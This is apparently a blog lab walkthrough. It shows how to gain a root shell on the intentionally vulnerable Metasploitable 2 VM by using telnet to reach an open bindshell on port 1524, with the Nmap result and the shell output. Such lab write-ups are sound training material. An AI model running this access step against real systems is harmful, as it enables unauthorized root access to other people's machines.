Metasploitable 2 server: Gaining rootshell from bindshell service

Goal: Gain root shell using telnet.

In my previous blog, we exploited the target using a Brute-force attack. In this chapter, we are going to gain root access from the bind shell.

From Nmap scanning, we have found that the bind shell service opens on port no: 1524.

PORT     STATE SERVICE     VERSION
1524/tcp open  bindshell   Metasploitable root shell

It is easy to gain access to the Linux shell by the following command:

┌─[mrdev@mr-dev]─[~]
└──╼ $telnet 192.168.56.3 1524
Trying 192.168.56.3...
Connected to 192.168.56.3.
Escape character is '^]'.
root@metasploitable:/# uname -r
2.6.24-16-server
root@metasploitable:/# root@metasploitable:/# uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
root@metasploitable:/# 

Post a Comment

0 Comments
* Please Don't Spam Here. All the Comments are Reviewed by Admin.

#buttons=(Ok, Go it!) #days=(20)

Our website uses cookies to enhance your experience. Learn More
Ok, Go it!